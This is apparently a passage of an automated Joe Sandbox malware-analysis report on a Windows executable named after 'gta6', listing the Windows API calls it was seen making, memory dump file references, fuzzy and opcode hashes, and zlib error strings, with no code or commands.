        • Part of subcall function 000000014000C4D0: RtlAddVectoredExceptionHandler.NTDLL ref: 000000014000C8C0
        • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
        • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
        • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
        • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
        • Part of subcall function 0000000140012210: RtlAllocateHeap.NTDLL ref: 0000000140012266
      • HeapDestroy.KERNEL32 ref: 000000014000124C
      • ExitProcess.KERNEL32 ref: 0000000140001258
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Heap$Allocate$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$00007A5550AllocDestroyExitInitializeProcessRemove
      • String ID:
      • API String ID: 2051489642-0
      • Opcode ID: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
      • Instruction ID: f14933b67cb23f8d7438bd3232522d16ce9264245af44939dd0cca49c0d9e1bd
      • Opcode Fuzzy Hash: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
      • Instruction Fuzzy Hash: 7A5108F0A11A4481FA03F7A3F8527E926159B9D7D4F808129BF1D1B3F3DD3A85598B22
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Heap$AllocateFreememset
      • String ID:
      • API String ID: 2774703448-0
      • Opcode ID: b0a2c0981b5be639708a6f3d132545d6a9b78e5287bbc147a43e1ebb83c57dbc
      • Instruction ID: a75182db50c1f984f89b78753495ac0ab196a1c9ad642d63c8067afd0bb8a22e
      • Opcode Fuzzy Hash: b0a2c0981b5be639708a6f3d132545d6a9b78e5287bbc147a43e1ebb83c57dbc
      • Instruction Fuzzy Hash: 12213B32605B5086EA1ADB53BC4179AA6A8F7C8FD0F498025AF584BB66DE79C852C340
      APIs
        • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
      • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
      • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
        • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
        • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
        • Part of subcall function 000000014000720C: RtlEnterCriticalSection.NTDLL ref: 0000000140007230
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
      • String ID:
      • API String ID: 547990026-0
      • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
      • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
      • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
      • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: AllocateHeapwcslen
      • String ID:
      • API String ID: 1345907364-0
      • Opcode ID: a0dc15986e3017cd2ed62ee5ac775f964501f34d63cb4b3c8d7d12bb2f12bec3
      • Instruction ID: cbd8129a4029e1d9ec6fd495d0fb7d522f2e550c82e6ba5ffb2ff9068418f6bb
      • Opcode Fuzzy Hash: a0dc15986e3017cd2ed62ee5ac775f964501f34d63cb4b3c8d7d12bb2f12bec3
      • Instruction Fuzzy Hash: B7F09276608A8086D621DB5AE45139AA7B0F7C9BC4F504125EBDC87B69DF3EC9518A00
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: File$AttributesDelete
      • String ID:
      • API String ID: 2910425767-0
      • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
      • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
      • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
      • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Heap$Allocate$AllocCreateValue
      • String ID:
      • API String ID: 3361498153-0
      • Opcode ID: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
      • Instruction ID: 1c20f48a7e0d63c5f07c3edeff385a7070e23dcbb2ee76a36a736f2f2e91a8b3
      • Opcode Fuzzy Hash: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
      • Instruction Fuzzy Hash: F9D0C939A1175092E746AB72A81A3E922A0F75C3C1F901419B70947771DF7E81965A40
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: DestroyFreeHeap
      • String ID:
      • API String ID: 3293292866-0
      • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
      • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
      • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
      • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CloseFreeHandleHeap
      • String ID:
      • API String ID: 1642312469-0
      • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
      • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
      • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
      • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: FileWrite
      • String ID:
      • API String ID: 3934441357-0
      • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
      • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
      • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
      • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Free
      • String ID:
      • API String ID: 3978063606-0
      • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
      • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
      • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
      • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CurrentDirectory
      • String ID:
      • API String ID: 1611563598-0
      • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
      • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
      • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
      • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: ExceptionHandlerRemoveVectored
      • String ID:
      • API String ID: 1340492425-0
      • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
      • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
      • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
      • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
      • String ID: BUTTON$C$EDIT$P$STATIC$n
      • API String ID: 1420713935-1690119102
      • Opcode ID: 002200ebb1e1213bc04a13eb1c4ef8fb9e0871078b3e41863b1eb0bca815023c
      • Instruction ID: 503d67efbf07ff6f248b06a67c50be69490569a40db1ce31eb7df8f18fb995d6
      • Opcode Fuzzy Hash: 002200ebb1e1213bc04a13eb1c4ef8fb9e0871078b3e41863b1eb0bca815023c
      • Instruction Fuzzy Hash: 59D134B5605B4086EB12DB62F8447AA77A5FB8CBC8F404129AF4A47B79DF7DC4498B00
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Window$ClassDestroyEnableNtdllProc_Unregister
      • String ID:
      • API String ID: 1396861415-0
      • Opcode ID: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
      • Instruction ID: a4636e2d5cbf899b35d7322a6c98c02ffc5b8df7e19630505cb7187d8542c3a3
      • Opcode Fuzzy Hash: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
      • Instruction Fuzzy Hash: 4A210BB4204A5182FB56DB27F8483B923A1E78CBC1F549026FB4A4B7B5DF3DC8859700
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
      • API String ID: 0-2665694366
      • Opcode ID: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
      • Instruction ID: 63a129330255db97eb1aabb126bfc5b4551e8f686405ea2d62c327762663274b
      • Opcode Fuzzy Hash: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
      • Instruction Fuzzy Hash: FB620572A106A48BE799CF25D498BED3BF9F748780F518129FB468B7A0E739C845C740
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID: $header crc mismatch$unknown compression method$unknown header flags set
      • API String ID: 0-4074041902
      • Opcode ID: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
      • Instruction ID: 440100e0ad3e42c115cce95f3fb78f0a990aae4413b5501bd8dd5ba0711be261
      • Opcode Fuzzy Hash: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
      • Instruction Fuzzy Hash: 7A02B1726007949BEBA78F16C488BAE3BE9FB4CB94F164518EF894B7A0D775C940C740
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
      • API String ID: 0-3255898291
      • Opcode ID: b59c351ebb6019647229452a56868728e5b182fd303493ccc03160f08c7a3aa8
      • Instruction ID: 3f1348f65b8f8bda14ba5cdfa7bf6f02fc8c4dbb68883e69d1ec2b1899c7470d
      • Opcode Fuzzy Hash: b59c351ebb6019647229452a56868728e5b182fd303493ccc03160f08c7a3aa8
      • Instruction Fuzzy Hash: C5D138326186D08BD71A8F3AD8447BD7FA1F3993C4F54811AEB968B791D63DCA4AC700
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID: incorrect header check$invalid window size$unknown compression method
      • API String ID: 0-1186847913
      • Opcode ID: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
      • Instruction ID: c7f0437dc46e56fef3014f932af091831cb3ca76e565b5a088b3fef6b265a946
      • Opcode Fuzzy Hash: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
      • Instruction Fuzzy Hash: 9391A2726106949BFBA6CF26C584B9E3BA9F70C794F114229EB464BBE1C736D950CB00
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID: $ $invalid block type
      • API String ID: 0-2056396358
      • Opcode ID: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
      • Instruction ID: 6826abb0ae9e935998ffe99ae2e08a78a36fe9b187ecd4f73c4f7ab9da41e151
      • Opcode Fuzzy Hash: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
      • Instruction Fuzzy Hash: 7161E3B3510B949BE766CF26C8887AD3BE8F708394F554229EB558B7E0D73AC490CB40
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: memcpy
      • String ID:
      • API String ID: 3510742995-0
      • Opcode ID: 1b03f7ef480ea5865ac2d9ef79243ddcad7e3d9da8d43d155ca602e5c9a73022
      • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
      • Opcode Fuzzy Hash: 1b03f7ef480ea5865ac2d9ef79243ddcad7e3d9da8d43d155ca602e5c9a73022
      • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 68354d835f18592a3392b19952e0fe910a5dfe6a9023353f29145046c6faf481
      • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
      • Opcode Fuzzy Hash: 68354d835f18592a3392b19952e0fe910a5dfe6a9023353f29145046c6faf481
      • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
      • Instruction ID: f294bca1e54ba5f97cd1887ffa6c8c7d976b4678fb34f7ffe8470b0002a4fcc7
      • Opcode Fuzzy Hash: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
      • Instruction Fuzzy Hash: 7B8150733301749BE7668A2EA514BE93290F3693CEFC56115FB8487B45CA3EB921CB50
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
      • Instruction ID: e67d2bfc1a2697f1f60af7736c02a9787f64ff3490f4c327f028a03746ec3e44
      • Opcode Fuzzy Hash: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
      • Instruction Fuzzy Hash: FE715CB23301749BEB658B2E9514BE93390F36A349FC56105EB855BB81CE3EB921CF50
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
      • Instruction ID: b94fce4af05d2a3b47cf10f4c42de706c870d6d3f1c440dba90fb4ad6b70bb1c
      • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
      • Instruction Fuzzy Hash: 3941BB32310640CAFBAA9B1AE020BEE3691E7997C5FD49115DB819FAF0D63BD4058B40
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ac13def6a5a8efd4e31b4935657a06df326012abae1516aab9cba758a36c4567
      • Instruction ID: bf6872aabbb71bd0daffb4897767ff28f083bf2ebca1510eb6d3b76ecabc12d3
      • Opcode Fuzzy Hash: ac13def6a5a8efd4e31b4935657a06df326012abae1516aab9cba758a36c4567
      • Instruction Fuzzy Hash: B0410DA740DBC51AF3A35A794C653AD3FA0A396F54F4E809BE3804B2E3E67748059312
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
